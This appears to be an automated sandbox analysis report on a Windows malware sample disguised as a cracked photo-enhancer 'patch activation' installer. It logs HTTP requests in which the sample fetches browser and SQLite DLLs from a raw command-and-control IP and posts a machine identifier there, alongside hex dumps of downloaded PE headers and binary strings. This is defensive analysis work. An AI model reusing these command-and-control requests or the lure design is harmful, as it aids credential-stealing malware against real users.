40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 90 0a 00 00 02 00 00 00 28 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 a0 0a 00 00 04 00 00 00 2a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 38 24 00 00 00 b0 0a 00 00 26 00 00 00 2e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Fri, 05 Aug 2022 11:54:20 GMTContent-Type: application/octet-streamContent-Length: 254392Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:58 GMTETag: "62543dbe-3e1b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 27 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f2 00 00 00 00 00 00 80 ce 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 a1 de 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 74 76 03 00 53 01 00 00 c7 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c2 03 00 b8 1f 00 00 00 c0 03 00 98 35 00 00 68 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 44 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 ca 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 04 ac 00 00 00 e0 02 00 00 ae 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 98 35 00 00 00 c0 03 00 00 36 00 00 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Fri, 05 Aug 2022 11:54:23 GMTContent-Type: application/octet-streamContent-Length: 1099223Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 12:28:56 GMTETag: "62541f08-10c5d7"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 22 a9 2c 62 00 76 0e 00 b2 13 00 00 e0 00 06 21 0b 01 02 19 00 0c 0b 00 00 fa 0c 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 20 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 10 0f 00 00 06 00 00 c8 9d 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 0c 00 6e 2a 00 00 00 e0 0c 00 d0 0c 00 00 00 10 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 e0 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c e2 0c 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 0a 0b 00 00 10 00 00 00 0c 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 20 0b 00 00 28 00 00 00 12 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 10 44 01 00 00 50 0b 00 00 46 01 00 00 3a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 a0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 6e 2a 00 00 00 b0 0c 00 00 2c 00 00 00 80 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 e0 0c 00 00 0e 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 f0 0c 00 00 02 00 00 00 ba 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 00 0d 00 00 02 00 00 00 bc 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 10 0d 00 00 06 00 00 00 be 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 e0 3b 00 00 00 20 0d 00 00 3c 00 00 00 c4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 60 0d 00 00 06 00 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 70 0d 00 00 ca 00 00 00 06 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 40 0e 00 00 28 00 00 00 d0 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00
                      Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                      Source: freebl3.dll.16.dr, mozglue.dll.16.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                      Source: freebl3.dll.16.dr, mozglue.dll.16.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                      Source: freebl3.dll.16.dr, mozglue.dll.16.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                      Source: freebl3.dll.16.dr, mozglue.dll.16.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                      Source: freebl3.dll.16.dr, mozglue.dll.16.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                      Source: freebl3.dll.16.dr, mozglue.dll.16.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                      Source: freebl3.dll.16.dr, mozglue.dll.16.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                      Source: freebl3.dll.16.dr, mozglue.dll.16.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: freebl3.dll.16.dr, mozglue.dll.16.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                      Source: freebl3.dll.16.dr, mozglue.dll.16.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                      Source: freebl3.dll.16.dr, mozglue.dll.16.drString found in binary or memory: http://ocsp.digicert.com0C
                      Source: freebl3.dll.16.dr, mozglue.dll.16.drString found in binary or memory: http://ocsp.digicert.com0N
                      Source: freebl3.dll.16.dr, mozglue.dll.16.drString found in binary or memory: http://ocsp.digicert.com0O
                      Source: freebl3.dll.16.dr, mozglue.dll.16.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.innosetup.com/
                      Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000000.459336953.0000000000401000.00000020.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
                      Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000000.459336953.0000000000401000.00000020.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                      Source: 2.0.0-beta2.cps.exe, 00000010.00000002.511072689.000000006D833000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.16.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                      Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000002.500341055.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.461402961.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.462132766.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503593390.0000000002257000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.470482188.000000000225C000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.469376595.00000000031B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.palkornel.hu/innosetup
                      Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000002.500341055.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.461402961.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.462132766.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503593390.0000000002257000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.470482188.000000000225C000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.469376595.00000000031B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.palkornel.hu/innosetup%1
                      Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.463131309.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.464570142.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.remobjects.com/ps
                      Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.463131309.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.464570142.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.remobjects.com/psU
                      Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510333215.0000000061ED1000.00000008.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                      Source: freebl3.dll.16.dr, mozglue.dll.16.drString found in binary or memory: https://mozilla.org0
                      Source: freebl3.dll.16.dr, mozglue.dll.16.drString found in binary or memory: https://www.digicert.com/CPS0
                      Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000002.500341055.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.461402961.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.462132766.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503593390.0000000002257000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503570926.0000000002250000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.470482188.000000000225C000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.469376595.00000000031B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mediachance.com/
                      Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503570926.0000000002250000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mediachance.com/&
                      Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000002.500341055.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.462132766.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503593390.0000000002257000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.470482188.000000000225C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mediachance.com/.
                      Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000002.500341055.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.462132766.00000000021C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mediachance.com/2
                      Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 51.195.166.178Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 51.195.166.178Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 51.195.166.178Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 51.195.166.178Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 51.195.166.178Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 51.195.166.178Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 51.195.166.178Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.178
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: mozzzzzzzzzzzHost: 51.195.166.178Content-Length: 94Connection: Keep-AliveCache-Control: no-cacheData Raw: 6d 61 63 68 69 6e 65 49 64 3d 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 7c 6a 6f 6e 65 73 26 63 6f 6e 66 69 67 49 64 3d 35 31 37 62 62 30 64 36 34 30 63 31 32 34 32 63 33 66 30 36 39 61 61 62 33 64 31 30 31 38 64 36 Data Ascii: machineId=d06ed635-68f6-4e9a-955c-4899f5f57b9a|user&configId=517bb0d640c1242c3f069aab3d1018d6

                      System Summary

                      barindex
                      PE file contains section with special chars
                      Source: 2.0.0-beta2.cps.exe.0.drStatic PE information: section name: .a|D
                      Source: 2.0.0-beta2.cps.exe.0.drStatic PE information: section name: .=xC
                      Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exeCode function: 21_2_004088C0
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00490830
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_004688B8
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00482CD8
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00472090
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00452194
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_0043E240
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_0043083C
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_0046A974
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_004449B8
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00434AB4
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00444F60
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_0048908C
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_004313C8
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00445658
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_004357B8
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_0045F954
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00445A64
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_0045BA04
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00489FEC
                      Source: C:\Users\user\Desktop\KbqArOlW06.exeProcess Stats: CPU usage > 98%
                      Source: 2.0.0-beta2.cps.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 2.0.0-beta2.cps.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp.21.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                      Source: sqlite3.dll.16.drStatic PE information: Number of sections : 18 > 10
                      Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exeCode function: 21_2_00409920 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00455E14 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: String function: 00453B40 appears 97 times
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: String function: 0040909C appears 45 times
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: String function: 0040596C appears 114 times
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: String function: 004587AC appears 84 times
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: String function: 00403400 appears 62 times
